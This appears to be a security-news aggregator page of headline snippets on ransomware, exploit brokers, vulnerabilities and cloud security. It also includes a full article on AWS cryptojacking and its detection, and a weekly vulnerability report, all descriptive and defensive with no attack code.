Finders Keypers is an open-source tool for analyzing the current usage of AWS KMS keys. It supports both AWS customer managed KMS keys and AWS Managed KMS keys. Use cases include: Identifying the blast radius of specific KMS keys and the resources they may impact, such as S3 data, databases like RDS and DynamoDB, and more. Assessing encryption access control to determine which principals may have access to data and resources. Evaluating the impact of … More → The post Finders Keypers: Open-source AWS KMS key usage finder appeared first on Help Net Security.

by Help Net Security

Security concerns around cloud environments has prompted 44% of CISOs to change cloud service provider, according to Arctic Wolf. This is being driven by the fact that 24% don’t believe their cloud environment is secure, and 43% think cloud service providers overpromised the security protection they would receive. CISOs rely on multiple cloud providers Cloud providers have become increasingly critical to firms, with the technology enabling workers to access files and services from any location. … More → The post Cloud providers aren’t delivering on security promises appeared first on Help Net Security.

by Help Net Security

ASPM gives organizations control by unifying risk data, automating threat analysis, and prioritizing vulnerabilities based on their business impact.

by Cybersecurity Dive

At MWC 2025, Google confirmed it was working on screen and video share capabilities for Gemini Live, codenamed ""Project Astra"". At that time, Google promised that the feature would begin rolling out soon, and now some users have spotted it in the wild. [...]

by BleepingComputer

Learn the easiest way to delete duplicate photos on your iPhone device with our simple, step-by-step guide.

by Hackread

Security Affairs Malware newsletter includes a collection of the best articles and research on malware in the international landscape Decrypting Encrypted files from Akira Ransomware (Linux/ESXI variant 2024) using a bunch of GPUs  Jaguar Land Rover Breached by HELLCAT Ransomware Group Using Its Infostealer Playbook—Then a Second Hacker Strikes  ClearFake’s New Widespread Variant: Increased Web3 […]

by Security Affairs

Gartner describes infrastructure as code (IaC) as a key way to unlock the potential of the cloud. However,…

by Hackread

A new round of the weekly SecurityAffairs newsletter arrived! Every week the best security articles from Security Affairs are free in your email box. Enjoy a new round of the weekly SecurityAffairs newsletter, including the international press. U.S. Treasury removed sanctions against the crypto mixer service Tornado Cash Zero-day broker Operation Zero offers up to […]

by Security Affairs

This week on the Lock and Code podcast, we speak with Carey Parker about what Google Chrome knows about you.

by Malwarebytes Labs

Cisco Talos found UAT-5918, active since 2023, using web shells and open-source tools for persistence, info theft, and credential harvesting. Cisco Talos uncovered UAT-5918, an info-stealing threat actor active since 2023, using web shells and open-source tools for persistence and credential theft. The APT UAT-5918 targets Taiwan, exploiting N-day vulnerabilities in unpatched servers for long-term […]

by Security Affairs

Key Points VanHelsing RaaS In recent weeks, a new and rapidly expanding ransomware-as-a-service (RaaS) program called VanHelsingRaaS has been making waves in the cybercrime world. Launched on March 7, 2025, this service has already demonstrated its rapid growth and deadly potential, having infected three victims within just two weeks of its introduction. Reputable affiliates can […] The post VanHelsing, new RaaS in Town appeared first on Check Point Research.

by Check Point Research

The supply chain attack involving the GitHub Action ""tj-actions/changed-files"" started as a highly-targeted attack against one of Coinbase''s open-source projects, before evolving into something more widespread in scope. ""The payload was focused on exploiting the public CI/CD flow of one of their open source projects – agentkit, probably with the purpose of leveraging it for further compromises,""

by The Hacker News

The FBI is warning that fake online document converters are being used to steal people''s information and, in worst-case scenarios, lead to ransomware attacks. [...]

by BleepingComputer

Here’s an overview of some of last week’s most interesting news, articles, interviews and videos: Critical Veeam Backup & Replication RCE vulnerability fixed, patch ASAP! (CVE-2025-23120) Veeam has released fixes for a critical remote code execution vulnerability (CVE-2025-23120) affecting its enterprise Veeam Backup & Replication solution, and is urging customers to quickly upgrade to a fixed version. FBI: Free file converter sites and tools deliver malware Malware peddlers are increasingly targeting users who are searching … More → The post Week in review: Veeam Backup & Replication RCE fixed, free file converter sites deliver malware appeared first on Help Net Security.

by Help Net Security

On Friday morning, March 21, 2025, at 9:00 a.m. UTC, a security advisory identified as CVE-2025-29927 was published. It cited a critical 9.1 severity vulnerability for mainstream Next.js applications.

by Snyk

Understand Open Files in Linux, including the lsof command, file descriptors (FD), and the Type field.🐧Continue reading on InfoSec Write-ups »

by InfoSec Write-ups

💰Cryptojacking: When Attackers Hijack Your Cloud to Mine Money🏴‍☠️Imagine this: 7AM still tired, you open your AWS dashboard, coffee in hand, and then… BOOOOM!!! 💥 A $15,000 bill instead of the usual $300. You check your account, refresh the page (just in case hehe)… but no, it’s real, you’re well awake!! 😱No, it’s not a billing mistake. Congratulations! You’ve just become the unwilling bankroller of a cybercriminal gang that hijacked your infrastructure to mine crypto — on YOUR dime, yay! 🎉> No worries.. you’re not alone in this nightmare. Cryptojacking attacks surged by 75% in 2023, according to Sysdig. Campaigns like AmberSquid 🦑 even exploit lesser-known AWS services to stay under the radar.☞ But as always, no worries! I got you! Let’s see how we can prevent this from happening & what to do if it’s the case.💡TL;DR — Go at the bottom of the page, a cool recap awaits you!😜📖 Kenza.. sorry but what Exactly is Cryptojacking?Good question! Cryptojacking is all about mining crypto at someone else’s expense. Instead of investing in hardware and paying for electricity, attackers squat on your cloud infrastructure. That’s the laziest attack lol.Back in the day, they simply launched EC2 instances loaded with mining software. But that became too easy to detect.➞ Now, they’re targeting less-monitored AWS services, such as:🚀 AWS Amplify🛳 AWS Fargate🤖 SageMakerMore subtle, more profitable, and much harder to catch. 🕵️‍♂️💡 Think of it like this: Someone is siphoning gas from your car without you noticing. The only difference? The thief doesn’t leave you a thank-you note.As technology evolves, attackers up their game too. Let’s dive into their arsenal…🏴‍☠️ The 3 Types of Cryptojacking: How attackers Drain Your Resources :Behind these attacks are highly organized groups with tactics straight out of a spy movie…💡 Now that you know how threat actors exploit different methods to hijack your resources, let’s look at a real-world example of how they target AWS services that often fly under the radar.🏴‍☠️ The Key Players in Cryptojacking: TeamTNT, Silent Bob & AmberSquidEveryone’s heard of TeamTNT and the Silent Bob campaign, but today, I want to focus on AmberSquid, which made waves in 2023.Silent Bob primarily attacks misconfigured Docker APIs and exposed JupyterLab instances. Check out AquaSec’s full analysis here: Silent Bob Cloud Attack.➡️ But AmberSquid? That’s a whole different story.credit hackmetrix🦑 AmberSquid: When Cryptojacking Targets AWS Services in the ShadowsDiscovered by Sysdig, AmberSquid struck where it hurts :AWS services that aren’t closely monitored — allowing attackers to mine crypto undetected.➞ While most cryptojacking campaigns focus on EC2, AmberSquid shifts its attention to:AWS AmplifyAWS FargateAmazon SageMakerAmazon Elastic Container Service (ECS)AWS CloudFormationThese services often lack strong security oversight, but for victims, the costs can skyrocket to over $10,000 per day (Sysdig Threat Research Team).💭 Imagine…Picture this : Peter, the CTO of a small innovative startup. One morning, as he checks his AWS bill, he notices an unexpected charge of $20,000. At first, he thinks it’s a mistake, but as he digs deeper, he realizes that resource usage exploded overnight… even though no new applications were deployed.> His heart skips a beat.. A mistake? He keeps digging… and discovers that a cryptocurrency miner has quietly set up shop on AWS Fargate and SageMaker. What seemed like a regular day quickly turns into a full-blown financial nightmare…And it can escalate really fast!Now that you’ve got the big picture of the AmberSquid campaign through Peter’s eyes, let’s take a closer look at how attackers successfully deployed malicious scripts to mine cryptocurrencies on seemingly harmless AWS services.🎯 Targets: Less Common, Yet Strategic ServicesBy choosing lesser-known services like Amplify, Fargate, and SageMaker, the attackers flew under the radar of traditional security mechanisms.➞This made detection and intervention much more complex, highlighting the importance of monitoring the entire infrastructure ; even the services that seem harmless.🔍 AmberSquid Attack Methodology:⓵ Attackers used AWS CodeCommit to create a private repository containing the code for an AWS Amplify app.⓶ From this repo, shell scripts were executed to deploy a web app on AWS Amplify, which secretly launched a crypto miner.⓷ Similar techniques were used to exploit Fargate and SageMaker, spinning up cloud resources for mining.➡ Here’s a breakdown of the AWS services used in this attack:💡 Key Lessons from the AmberSquid AttackThe AmberSquid attack highlights several critical takeaways:🔹 Exploitation of less-monitored services → Services like Fargate and SageMaker, not typically associated with cryptojacking, were used to mine crypto. This proves the importance of monitoring all cloud services, not just EC2.🔹 Code pipeline security → Attackers used CodeCommit to store malicious scripts. This underscores the need to secure your entire CI/CD pipeline, including AWS Amplify.🔹 Visibility gaps → Services like Fargate offer limited real-time visibility, making it harder to detect cryptojacking activities.🔹 Risk of shell scripts → Attackers deployed crypto miners via scripts on services like Lambda and SageMaker, emphasizing the need for strict execution permissions.🔹 Unexpected costs → AWS’s pay-as-you-go pricing makes cryptojacking profitable for attackers while remaining unnoticed until you get a massive bill.These insights show that attackers are getting stealthier, favoring low-profile techniques that evade detection. This makes proactive cloud security a must.💸 The Real Cost of that Incident :➞ Once attackers infiltrate your AWS account and launch crypto miners, your costs skyrocket within hours.💰 Here’s a daily cost estimate based on real-world attacks:Threat actors now target overlooked cloud services, exploiting automation and high-performance resources to launch cryptojacking campaigns. The result? Sky-high bills and hard-to-detect damages.➡️ For more details, check out 🔗 Sysdig Blog: AmberSquid Analysis.Cryptojacking isn’t just stealing your compute power — it’s draining your budget, resources, and security posture. Time to fight back. 🛡️🚀💰 How Does an AWS Account Fall Victim to Cryptojacking?Attackers don’t mine just any cryptocurrency. They focus on:Monero (XMR) → Anonymous, easy to mine on CPU. The #1 choice for cryptojacking.Ethereum (ETH) → Used to be profitable before Proof-of-Stake, but was a major target.Zcash (ZEC) → Highly valued for its private transactions.Bitcoin (BTC) → Rare in cryptojacking (too resource-intensive).🚨 How do they Infiltrate Your AWS Account ?Cybercriminals gain access to AWS accounts in multiple ways:1️⃣ Leaked credentials → If your AWS keys leak on GitHub, you’re an easy target. 80% of cloud compromises start with exposed credentials. (Unit 42, Oct 2023).2️⃣ No MFA → No Multi-Factor Authentication? They can easily use stolen credentials.3️⃣ Privilege escalation → Once inside, attackers escalate privileges, targeting admin accounts or overly permissive IAM roles.4️⃣ Subscription hijacking → They move your resources to another tenant, making detection even harder.⚡ Rapid Setup: From AWS Account to Crypto Mining Farm :Once inside, attackers waste no time. Their goal? Turn your cloud into a mining farm within minutes.If GPUs are available, they deploy NVIDIA GPU drivers to maximize computing power.🔍 Signs of Cryptojacking Activity:➞ Sudden, massive deployment of GPU drivers.➞ Unknown accounts installing GPU extensions for no reason.➞ Connections to known mining pools➥️ More details in this research: “Behavior-Based Detection of GPU Cryptojacking” (Ural Federal Univ, Aug 2024)🧐 Why Is Cryptojacking So Popular Among Attackers ?Because it’s the perfect scam:✅ Zero investment → No hardware costs, no electricity bills, no personal risk. ( Told you, the laziest attack..)✅ Guaranteed profit → Your cloud infrastructure becomes their cash factory.✅ Maximum stealth → Miners run silently in the background, undetected for weeks.With skyrocketing electricity costs and the increasing difficulty of traditional mining, cryptojacking has become a highly profitable business.🚨 The Hidden Costs to You and Your Business 💸➞ For You, the AWS Customer:Skyrocketing AWS bills (up to $50,000+ in a few days).Slower applications or random crashes affecting your services.Increased attack surface, opening doors for more security breaches.➞ For Your Business:Significant financial losses due to unauthorized compute usage.Legal & compliance risks, especially if sensitive data is compromised.Wasted resources on incident response and mitigation.⚖️ The Legal Risks You Can’t Ignore :Regulations like GDPR (EU) and CCPA (California) enforce strict compliance rules. If your AWS infrastructure is compromised, you could face severe consequences:➤ Mandatory breach notification (72 hours under GDPR).➤ Your company is liable, even if an external attack caused the breach.➤ Fines up to 4% of global revenue or €20M (whichever is higher).➤ You must prove that proper security measures were in place.💬 “Cryptojacking is often seen as simple resource theft, but it frequently leads to serious data breaches.”🔎 How to Detect a Cryptojacking Attack?Look for these key warning signs in your AWS environment:➩ 📊 Unusual CPU/GPU consumption (spikes in compute usage).➩ 💰 Unexplained AWS bill increase (sudden cost surges).➩ 🔍 Suspicious connections to your cloud resources.➩ 🌐 Outbound traffic to known mining pools.➩ 🛠️ Use AWS security tools (CloudTrail, GuardDuty, SIEM logs).➩ 🍯 Deploy honeypots to trap and analyze attackers before they cause damage. (KTH Research Paper)🌍 Monitor for Mining Pool Connections☞ As you know by now, cryptojackers hijack computing power to mine cryptocurrency, often relying on mining pools — platforms where miners collaborate and share rewards. ☞ Monitoring these connections can help you detect unauthorized mining activity.⛏️ Common mining pool domains to watch out for:nanopool.orgnicehash.comsupportxmr.comhashvault.prozpool.caherominers.comf2pool.comminexmr.commoneroocean.streamminer.rocks➥️ Source: Microsoft Security Blog, 2023🛠️ AWS Tools to Detect CryptojackingNow that you understand the threat, it’s time to secure your AWS environment… 🚀🛡️ How to Protect Your AWS Account from Cryptojacking🔐 Best practices to strengthen your cloud security:You should be good to go now!📌 Reference: MITRE ATT&CK, Oct 2024🚨 But.. Kenza, what should I do if my AWS Account is compromised ?➞ Revoke compromised IAM keys & tokens to block attacker access.➞ Stop all suspicious instances immediately.➞ Analyze CloudTrail logs to track the attack’s origin.➞ Rotate all exposed credentials and review IAM permissions.➞ Contact AWS Support → They can help mitigate financial impact.⚠️ Every second counts! The faster you respond, the lower the cost. ⚠️🔮 Future of Cryptojacking: Emerging TrendsThreat actors are constantly evolving. Here’s what’s coming next:🧠 AI-powered cryptojacking :Uses AI to optimize mining operations while avoiding detection.Dynamically alters malware signatures to bypass security tools. ➡️ Source: Datagroup, 2024📋 Ultimate Anti-Cryptojacking ChecklistLast table..I promise.🎯 Final Thoughts: Secure Your Cloud Before malicious people turn it into a Gold Mine!Cryptojacking is getting more sophisticated — but with the right security measures, you can fight back.🛡️ It’s an invisible heist. Only a well-locked system can protect you.So… are you ready to secure your AWS infrastructure? 🚀Thanks for taking the time to read! Looking forward to reading your feedback as always!My Networks:💬 LinkedIn — Let’s Connect!👾 Discord🧪 GitHub — AWS Security Projects straight from 2065.💰Cryptojacking: When Hackers Hijack Your Cloud to Mine Money🏴‍☠️ was originally published in InfoSec Write-ups on Medium, where people are continuing the conversation by highlighting and responding to this story.

by InfoSec Write-ups

📝Free Article LinkContinue reading on InfoSec Write-ups »

by InfoSec Write-ups

A new Active Directory vulnerability is making waves in the cybersecurity world! Following the discovery of the zero-click OLE…Continue reading on InfoSec Write-ups »

by InfoSec Write-ups

Hello, my digital adventurers! Today, I will be sharing my write-up for the HackTheBox Sherlock challenge, “Origins”.Continue reading on InfoSec Write-ups »

by InfoSec Write-ups

Cybercriminals are always looking for new ways to take advantage of people. One effective method they use is…

by Hackread

Counterfeit products are a growing problem in today’s market. With advancements in technology, counterfeiters have become more skilled…

by Hackread

The U.S. Treasury is lifting sanctions on Tornado Cash, a crypto mixer accused of helping North Korea’s Lazarus Group launder illicit funds. The U.S. Treasury Department removed sanctions against the cryptocurrency mixer service Tornado Cash. In August 2022, the U.S. Treasury Department’s Office of Foreign Assets Control (OFAC) sanctioned the crypto mixer service Tornado Cash used by […]

by Security Affairs

The U.S. Treasury Department has announced that it''s removing sanctions against Tornado Cash, a cryptocurrency mixer service that has been accused of aiding the North Korea-linked Lazarus Group to launder their ill-gotten proceeds. ""Based on the Administration''s review of the novel legal and policy issues raised by use of financial sanctions against financial and commercial activity occurring

by The Hacker News

Cloudflare announced that it closed all HTTP connections and it is now accepting only secure, HTTPS connections for api.cloudflare.com. [...]

by BleepingComputer

Cybercriminals are abusing Microsoft''s Trusted Signing platform to code-sign malware executables with short-lived three-day certificates. [...]

by BleepingComputer

Russian zero-day broker Operation Zero is looking for exploits for the popular messaging app Telegram, offering up to $4 million for them. Operation Zero, a Russian zero-day broker, is offering up to $4 million for Telegram exploits, the news was first reported by Tech Crunch. The Russian firm seeks up to $500K for one-click RCE, […]

by Security Affairs

TeamPass 3.0.0.21 - SQL Injection

by Exploit DB

Aztech DSL5005EN Router - ''sysAccess.asp'' Admin Password Change (Unauthenticated)

by Exploit DB

Microsoft Windows - NTLM Hash Leak Malicious Windows Theme

by Exploit DB

Botnets are becoming more sophisticated and accessible. DDoS attacks, cryptocurrency mining and data theft are just a few examples of botnet capabilities.

by Barracuda

DOGE is making unexpected moves at CISA, including rehiring fired probationary employees only to put them on paid leave, and reportedly gutting the agency''s red teams.

by Dark Reading

The attackers are taking an indirect approach to targeting SEO professionals and their Google credentials, using a fake digital marketing website.

by Dark Reading

Law enforcement entities in democratic states have been deploying top-of-the-line messaging app spyware against journalists and aid workers.

by Dark Reading

by ComputerWeekly

Valve removed a video game called Sniper: Phantom''s Resolution from Steam after users reported that its free demo contained malware.

by TechCrunch

Threat hunters have uncovered a new threat actor named UAT-5918 that has been attacking critical infrastructure entities in Taiwan since at least 2023. ""UAT-5918, a threat actor believed to be motivated by establishing long-term access for information theft, uses a combination of web shells and open-sourced tooling to conduct post-compromise activities to establish persistence in victim

by The Hacker News

Authorities in at least two U.S. states last week independently announced arrests of Chinese nationals accused of perpetrating a novel form of tap-to-pay fraud using mobile devices. Details released by authorities so far indicate the mobile wallets being used by the scammers were created through online phishing scams, and that the accused were relying on a custom Android app to relay tap-to-pay transactions from mobile devices located in China.

by Krebs on Security

The threat actors behind the Medusa ransomware-as-a-service (RaaS) operation have been observed using a malicious driver dubbed ABYSSWORKER as part of a bring your own vulnerable driver (BYOVD) attack designed to disable anti-malware tools. Elastic Security Labs said it observed a Medusa ransomware attack that delivered the encryptor by means of a loader packed using a packer-as-a-service (PaaS

by The Hacker News

After Windows defenses improved, the attackers switched to targeting Mac and Safari users with these very effective scams.

by ZDNET Security

The latest version patches a critical security flaw that could allow a web page to run malicious code in the browser.

by ZDNET Security

The release of the JFK assassination records also resulted in the leak of hundreds of Social Security Numbers

by Malwarebytes Labs

The China-linked advanced persistent threat (APT) group known as Aquatic Panda has been linked to a ""global espionage campaign"" that took place in 2022 targeting seven organizations. These entities include governments, Catholic charities, non-governmental organizations (NGOs), and think tanks across Taiwan, Hungary, Turkey, Thailand, France, and the United States. The activity, which took place

by The Hacker News

After conducting over 10,000 automated internal network penetration tests last year, vPenTest has uncovered a troubling reality that many businesses still have critical security gaps that attackers can easily exploit. Organizations often assume that firewalls, endpoint protection, and SIEMs are enough to keep them secure. But how effective are these defenses when put to the test? That’s where

by The Hacker News

Update: Following the publication of this article, we were informed that the French parliament voted against the controversial bill, so the threat to people''s privacy has been negated, for now. However, it is often the case that governments retract law proposals when those are met with fierce resistance from the public only to reintroduce them … The post Signal Threatens to Leave France Over Proposed Encryption Backdoor Law appeared first on CyberInsider.

by Cyber Insider

Internal and external penetration testing are critical components of a holistic security testing program. Learn the differences and use cases of each type. The post Internal vs. External Penetration Testing: What You Need to Know appeared first on NetSPI.

by NetSPI

A Russian exploit broker is offering up to $4 million for zero-day vulnerabilities targeting Telegram, underscoring the growing value of messaging app exploits amid rising demand for covert surveillance capabilities. Operation Zero, a zero-day acquisition company based in Saint Petersburg, posted the bounty this week, publicly seeking remote code execution (RCE) vulnerabilities for Telegram on … The post Russian Zero-Day Firm Offers Record $4 Million for Telegram Exploits appeared first on CyberInsider.

by Cyber Insider

Enterprises lack visibility into their own data, creating security risks that are compounding as organizations and their employees increase AI adoption, according to Bedrock Security. The majority of organizations struggle to track sensitive information across sprawling cloud environments, leaving them vulnerable to data breaches and compliance failures. The research also documents a significant shift in security roles, with nine in 10 professionals surveyed reporting their responsibilities have evolved in the past year, most notably in … More → The post 53% of security teams lack continuous and up-to-date visibility appeared first on Help Net Security.

by Help Net Security

Two known threat activity clusters codenamed Head Mare and Twelve have likely joined forces to target Russian entities, new findings from Kaspersky reveal. ""Head Mare relied heavily on tools previously associated with Twelve. Additionally, Head Mare attacks utilized command-and-control (C2) servers exclusively linked to Twelve prior to these incidents,"" the company said. ""This suggests

by The Hacker News

The fake listings were part of a scam that used the old bait-and-switch tactic to prey on people - and there may be more lurking out there.

by ZDNET Security

In today’s world, cybersecurity is more critical than ever. Organizations and individuals alike face a constant barrage of cyber threats, and often, the weakest link in our defenses is something as simple as a password.

by KnowBe4

Bitdefender warns that a major ad fraud campaign in the Google Play Store resulted in more than 60 million downloads of malicious apps.

by KnowBe4

The new gang appears to have links to the defunct LockBit group.

by ThreatDown

The time to secure foundations, empower teams, and make cyber resilience the standard is now — because the cost of waiting is far greater than the investment in proactive security.

by Dark Reading

A former University of Michigan football coach has been indicted for carrying out a nearly decade-long hacking campaign targeting over 100 U.S. colleges and universities, compromising sensitive medical records and personal accounts of more than 150,000 student athletes. The scheme, allegedly orchestrated by 42-year-old Matthew Weiss, involved unauthorized access to databases maintained by a third-party … The post Ex-Michigan Football Coach Indicted for Hacking Databases of 150,000 Students appeared first on CyberInsider.

by Cyber Insider

Using Cloudflare’s CASB, integrate, scan, and detect sensitive data and misconfigurations in your cloud storage accounts.

by Cloudflare

Two sources in the zero-day industry say Operation Zero''s prices for exploits against the popular messaging app Telegram will depend on different factors.

by TechCrunch

Three new bugs added to CISA''s KEV catalog, RaaS affiliates use new custom backdoor, and compromised GitHub Action exposes CI/CD secrets. The post The Good, the Bad and the Ugly in Cybersecurity – Week 12 appeared first on SentinelOne.

by SentinelOne

Cloudflare now provides clientless, browser-based support for the Remote Desktop Protocol (RDP). It enables secure, remote Windows server access without VPNs or RDP clients.

by Cloudflare

Customers can now easily safeguard sensitive data in Microsoft Outlook with our new DLP Assist feature.

by Cloudflare

This post is a beginner''s guide to lattices, the math at the heart of the transition to post-quantum (PQ) cryptography. It explains how to do lattice-based encryption and authentication from scratch.

by Cloudflare

Cloudflare’s Data Loss Prevention is reducing false positives by using a self-improving AI-powered algorithm, built on Cloudflare’s Developer Platform.

by Cloudflare

Cloudflare is now assessed at the IRAP PROTECTED level, bringing our products and services to the Australian Public Sector.

by Cloudflare

As IT teams grapple with app sprawl and inefficiencies, organizations are prioritizing IT consolidation to cut costs, improve productivity, and streamline operations.

by ITPro Today

According to new research entitled Cyber Security in Critical National Infrastructure: 2025, from Bridewell, a leading UK-based cyber security services provider, one-third of UK CNI organisations targeted by ransomware admitted to paying the ransom – a practice which has been hotly debated in recent times. Furthermore, a staggering 95% of UK Critical National Infrastructure (CNI) […] The post One-third of CNI organisations admit to paying ransomware according to new report from Bridewell appeared first on IT Security Guru.

by IT Security Guru

Researchers from Palo Alto Networks said the hackers likely planned to leverage an open source project of the company for additional attacks.

by Cybersecurity Dive

"ABYSSWORKER" imitates a CrowdStrike Falcon driver.

by Cybersecurity Dive

This PowerShell tutorial explains how to build a simple tabbed GUI using a Windows Form and a TabControl. Each tab is created using TabPage objects.

by ITPro Today

Valve has delisted a suspicious game from the Steam platform after community-led investigations revealed its downloadable demo was, in fact, a malware-laced executable hosted outside the Steam ecosystem. The game, titled Sniper: Phantom''s Resolution, first drew suspicion when users noticed promotional material on its Steam page appeared to be lifted from unrelated titles. Reddit users … The post Steam Removes “Sniper: Phantom’s Resolution” After Users Find Malware in Demo appeared first on CyberInsider.

by Cyber Insider

Two now-patched security flaws impacting Cisco Smart Licensing Utility are seeing active exploitation attempts, according to SANS Internet Storm Center. The two critical-rated vulnerabilities in question are listed below -  CVE-2024-20439 (CVSS score: 9.8) - The presence of an undocumented static user credential for an administrative account that an attacker could exploit to log in to an

by The Hacker News

Overview The weekly vulnerability insights report to clients sheds light on the most pressing cybersecurity vulnerabilities that have been identified and exploited. This weekly vulnerability insights report highlights the continuous efforts of organizations to protect their systems and networks from cyber threats, focusing on critical vulnerabilities that demand immediate attention from security professionals. Notably, the Cybersecurity and Infrastructure Security Agency (CISA) has updated its Known Exploited Vulnerability (KEV) catalog to include multiple high-severity flaws that are actively being targeted by attackers. During the week of March 12, 2025, CISA added several vulnerabilities to its KEV catalog, reflecting growing concerns about overactive exploitation. Among these, CVE-2025-30066 stood out as a severe threat, involving an authentication bypass vulnerability in the tj-actions/changed-files GitHub Action. This flaw allows attackers to execute arbitrary code on affected systems by exploiting improper validation in the GitHub Action. The high-severity flaw has been flagged for urgent attention, though, as of the report’s publication, no proof-of-concept (PoC) or exploit has been observed in the wild. Alongside CVE-2025-30066, CVE-2025-24472 in Fortinet''s FortiOS and FortiProxy products also made their way into the catalog. This authentication bypass vulnerability is particularly alarming as it permits attackers to gain super-admin privileges remotely, bypassing standard authentication mechanisms. With a CVSSv3 score of 8.1, it poses security risks to affected networks. Additionally, CVE-2025-21590 in Juniper’s Junos OS was listed, a vulnerability related to improper isolation that can lead to unintended access and data exposure. Notable Vulnerabilities Identified in the Weekly Vulnerability Insights Report CRIL’s analysis delved deeper into several key vulnerabilities during the week, shedding light on their exploitation potential. Among the vulnerabilities investigated, CVE-2024-54085, an authentication bypass in AMI’s MegaRAC BMC, was identified as critical. This vulnerability allows remote attackers to gain full control over affected servers without authentication, paving the way for potential malware deployment or even hardware damage. The risk is compounded by the lack of public internet exposure, making it difficult to defend against potential attacks that might go undetected for longer periods. Another critical vulnerability analyzed by Cyble was CVE-2025-24813 in Apache Tomcat. This remote code execution (RCE) flaw allows attackers to exploit improper file path handling during partial PUT requests, granting unauthorized access to the affected system. The flaw was observed to be actively discussed in underground forums, with PoC code circulating widely. As a widely used Java servlet container, Apache Tomcat’s exposure to this flaw presents a considerable risk to enterprises and their web applications. In addition, vulnerabilities such as CVE-2025-25292 and CVE-2025-25291 in ruby-saml and CVE-2025-27363 in the FreeType library further highlight the widespread and diverse nature of vulnerabilities, ranging from authentication bypasses to out-of-bounds write issues. Threats on Underground Forums and Markets CRIL also reported disturbing activity in underground forums and dark web marketplaces, where threat actors discussed and offered exploits for various vulnerabilities. Notable discussions included CVE-2025-26319 and CVE-2025-26633, which involved critical arbitrary file upload vulnerabilities and improper input validation flaws, respectively. Both were being actively weaponized by attackers to infiltrate systems and gain unauthorized access. Additionally, exploits for vulnerabilities such as CVE-2025-26776 in the Chaty Pro plugin for WordPress and CVE-2025-1128 in Everest Forms plugin for WordPress were being advertised. These critical flaws could allow attackers to execute arbitrary actions on compromised servers, further emphasizing the growing trend of weaponizing vulnerabilities through readily available exploits in underground communities. Further unsettling was the report of a zero-day exploit in TP-Link Routers being sold for USD 1,000 on dark web forums. The exploit, which enables remote code execution (RCE), allows attackers to disable firewalls, steal credentials, and open encrypted backdoors on affected routers. Such active sales of exploits underscore the increasing commodification of zero-day vulnerabilities, making it easier for malicious actors to launch sophisticated attacks. Vulnerabilities Under Scrutiny Several vulnerabilities continued to attract attention during the week, with PoCs or exploits observed on various forums. These include: CVE-2025-26319 (FlowiseAI): A critical vulnerability in FlowiseAI v2.2.6, related to arbitrary file uploads. CVE-2025-24813 (Apache Tomcat): A flaw that allows remote code execution, actively discussed and exploited. CVE-2025-26633 (Microsoft Management Console): A high-severity issue impacting Microsoft systems. Recommendations for Mitigating Exploitation Risks To defend against the increasing threats posed by these vulnerabilities, organizations must adopt robust security practices. Here are several critical recommendations: Ensure that all systems are updated with the latest security patches from vendors. Critical patches, especially those for vulnerabilities like CVE-2025-24472 and CVE-2025-24813, should be prioritized to mitigate active exploitation risks. Establish a comprehensive patch management strategy that includes regular assessments, testing, deployment, and verification of updates. Automation tools can assist in streamlining the patch application process, ensuring consistency and timely implementation. Proper segmentation of networks can prevent attackers from moving laterally within the environment, reducing exposure to critical assets. Develop and continuously update incident response plans to ensure preparedness in the event of an attack. These plans should include procedures for identifying, containing, and mitigating active threats. Conduct VAPT exercises regularly to identify vulnerabilities before attackers can exploit them. Periodically, conduct audits to maintain compliance with internal and external security standards. Invest in comprehensive monitoring tools and systems, such as SIEM platforms, to detect abnormal behaviors and potential exploitation attempts. Educate employees and stakeholders about the latest cybersecurity threats, including recognizing phishing attempts and malicious links that may exploit vulnerabilities such as CVE-2025-30066. Conclusion The vulnerabilities identified from March 12 to March 18, 2025, highlight the ongoing battle against cyber threats. Active exploitation of vulnerabilities like CVE-2025-24472 in FortiOS and CVE-2025-24813 in Apache Tomcat reinforces the importance of timely patching and vigilance. With threat actors increasingly relying on underground forums and exploiting markets to spread Proof of Concepts and zero-day exploits, it is important for organizations to remain proactive and continually update their security measures to mitigate these cyber threats. Adopting better security practices is crucial for protecting sensitive data and ensuring the integrity of your systems. A comprehensive threat intelligence solution like Cyble can track potential threats, vulnerabilities, and leaks specific to your environment, enabling you to take swift action before they escalate into major incidents. For full access to IT vulnerability reports and other insights from Cyble, click here. References: https://nvd.nist.gov/vuln/detail/cve-2025-30066 https://nvd.nist.gov/vuln/detail/CVE-2025-24472 https://nvd.nist.gov/vuln/detail/CVE-2025-21590 https://nvd.nist.gov/vuln/detail/CVE-2025-26319 https://nvd.nist.gov/vuln/detail/CVE-2025-24813 https://nvd.nist.gov/vuln/detail/CVE-2025-26633 The post Underground Market Exploits and Active Threats: Key Takeaways from the Weekly Vulnerability Insights Report appeared first on Cyble.

by CYBLE

Breach and Attack Simulation (BAS) is the safest and most effective way to validate an organization''s security posture. Unlike traditional methods such as manual penetration testing, automated red teaming, or vulnerability scanning, BAS provides continuous, controlled, and risk-free assessments without exposing systems to real threats. It eliminates the risks of invasive testing, human error, and limited coverage, ensuring real-time security validation without operational impact.

by Picus Security

Amid growing concerns over Big Tech firms aligning with Trump administration policies, people are starting to move their digital lives to services based overseas. Here''s what you need to know.

by WIRED Security News

Cybercriminals behind the Fog ransomware publish leaked data along with the IP addresses of attacked computers.

by Kaspersky

Overview Cyble’s weekly industrial control system (ICS) vulnerability report to clients examined 66 ICS, operational technology (OT), and Supervisory Control and Data Acquisition (SCADA) vulnerabilities found in 18 recent advisories from the U.S. Cybersecurity and Infrastructure Security Agency (CISA). The 66 vulnerabilities include 30 high-severity flaws and 15 critical vulnerabilities across eight sectors, ranging from energy and healthcare to transportation, critical manufacturing, chemical, food and agriculture, wastewater, and commercial facilities. Cyble highlighted two of the CISA advisories as meriting particularly high attention because of vulnerabilities found in solar energy management and cardiology diagnostic systems. Critical ICS Vulnerabilities Cyble noted that vulnerabilities within Sungrow iSolarCloud “are among the important ones as they impact critical energy management systems.” Sungrow’s iSolarCloud Android App and WiNet firmware are critical for monitoring and controlling solar energy infrastructure, enabling users to optimize performance and ensure seamless operations. Eight critical vulnerabilities in particular pose significant risks to the energy sector, as successful exploitation could result in attackers accessing and modifying sensitive information. The vulnerabilities include eight flaws rated between CVSS v4 9.2 and 9.5. Those include: CVE-2024-50693 and CVE-2024-50689: These are both 9.2-rated Authorization Bypass Through User-Controlled Key vulnerabilities CVE-2024-50692: a 9.5-severity Use of Hard-Coded Credentials vulnerability CVE-2024-50694, CVE-2024-50695 and CVE-2024-50697: 9.5-severity Stack-Based Buffer Overflow vulnerabilities CVE-2024-50698: a 9.5-rated Heap-Based Buffer Overflow vulnerability 